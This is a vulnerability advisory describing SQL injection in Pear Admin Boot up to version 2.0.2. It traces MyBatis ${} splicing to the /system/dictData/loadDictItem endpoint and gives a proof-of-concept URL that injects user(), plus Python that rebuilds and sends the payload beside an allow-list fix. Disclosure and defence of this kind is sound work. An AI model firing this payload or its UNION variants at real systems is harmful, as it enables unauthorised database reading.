Vulnerability Product: Pear Admin Boot
Vulnerability version: <=2.0.2
Vulnerability type: SQL injection
Vulnerability Details:
First, in com/pearadmin/modules/sys/mapper/xml/SysDictDataMapper.xml we found that the three parameters text, code and table are spliced into the statement with ${} rather than #{}. MyBatis substitutes a ${} value into the SQL string verbatim (only #{} becomes a PreparedStatement parameter), so whatever reaches these three parameters is executed as SQL. Next we trace how they are populated.
In com/pearadmin/modules/sys/mapper/SysDictDataMapper.java:62 the queryTableDictByKeys method is declared. Now we look for its callers.
The method is called from com/pearadmin/modules/sys/service/impl/SysDictDataServiceImpl.java:101; we continue up the call chain.
That service method is in turn called from com/pearadmin/modules/sys/controller/SysDictDataController.java:127. The text, code and table variables are taken from the /system/dictData/loadDictItem/{dictCode} interface: the values arrive in the path segment and are handed through the service layer to the mapper without any validation.
Proof of concept (the comma-separated path segment supplies the table, code and text values: sys_user becomes the table, and user() replaces one of the column parameters, so MySQL evaluates the function inside the query):
http://localhost:8088/system/dictData/loadDictItem/sys_user,user(),1?key=1
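The following is an added example, not code from Pear Admin Boot. It rebuilds the payload URL above and models the mapper's ${} splicing in Python beside an allow-list version that rejects anything that is not a known table or column name. The exact SQL shape and the assumption that dictCode is "table,code,text" are mine; sqlite3 stands in for MySQL, so sqlite_version() plays the role of user() from the payload. The sys_user rows are constructed sample data.

```python
"""
Added example, not Pear Admin Boot's code. Models three ${} fragments
(table, code, text) spliced into a SQL string, beside an allow-list
version. SQL shape and dictCode layout are assumptions; sqlite3 stands
in for MySQL, so sqlite_version() replaces user() from the payload.
"""
import re
import sqlite3
import urllib.request
from urllib.parse import quote

ENDPOINT = "http://localhost:8088/system/dictData/loadDictItem/"
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def build_payload_url(table: str, code: str, text: str, key: str = "1") -> str:
    """Rebuild the page's URL. Assumption: dictCode is 'table,code,text'."""
    dict_code = ",".join((table, code, text))
    # keep ',', '(' and ')' literal so the URL matches the page's payload
    return f"{ENDPOINT}{quote(dict_code, safe=',()')}?key={quote(key)}"


def fetch(url: str, timeout: float = 5.0) -> bytes:
    """Send the request (needs a running instance; not executed here)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the sys_user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (user_id INTEGER, username TEXT)")
    conn.execute("INSERT INTO sys_user VALUES (1, 'alice')")
    return conn


def query_vulnerable(conn, table: str, code: str, text: str):
    """Mimics ${} substitution: each fragment lands in the SQL verbatim."""
    sql = f'SELECT {text} AS "text", {code} AS "code" FROM {table} LIMIT 1'
    return conn.execute(sql).fetchone()


def query_hardened(conn, table: str, code: str, text: str):
    """Same query, but identifiers are checked against the schema before
    being spliced in (table/column names cannot be bound with #{} or ?)."""
    for frag in (table, code, text):
        if not IDENT.fullmatch(frag):
            raise ValueError(f"rejected SQL fragment: {frag!r}")
    tables = {r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")}
    if table not in tables:
        raise ValueError(f"unknown table: {table!r}")
    # table matched IDENT and exists in the schema, so quoting it is safe
    columns = {r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')}
    for col in (code, text):
        if col not in columns:
            raise ValueError(f"unknown column {col!r} in {table!r}")
    sql = (f'SELECT "{text}" AS "text", "{code}" AS "code" '
           f'FROM "{table}" LIMIT 1')
    return conn.execute(sql).fetchone()


if __name__ == "__main__":
    print(build_payload_url("sys_user", "user()", "1"))
    db = sample_db()
    print(query_vulnerable(db, "sys_user", "user_id", "username"))
    # the attacker-controlled expression is evaluated by the database engine
    print(query_vulnerable(db, "sys_user", "sqlite_version()", "1"))
    try:
        query_hardened(db, "sys_user", "sqlite_version()", "1")
    except ValueError as e:
        print("hardened:", e)
```

Against MySQL the same substitution evaluates user() and, with a UNION or subquery in place of it, reads any table the application account can see. Because MyBatis cannot bind table or column names with #{}, the fix is the allow-list shown in query_hardened: validate the three fragments against the schema (or a fixed set of dictionary tables) before they reach the mapper, and bind the key value with #{}.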